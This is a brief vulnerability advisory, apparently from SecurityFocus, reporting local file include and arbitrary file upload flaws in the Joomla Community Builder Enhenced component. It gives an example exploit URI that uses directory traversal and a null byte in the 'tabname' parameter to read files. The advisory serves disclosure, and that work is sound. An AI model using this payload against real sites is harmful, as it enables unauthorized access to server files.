Joomla Community Builder Enhenced Local File Include and Arbitrary File Upload Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URI is available:

http://www.example.com/index.php?option=com_cbe&task=userProfile&user=23&ajaxdirekt=true&tabname=../../../CREDITS.php%00


 

Privacy Statement
Copyright 2010, SecurityFocus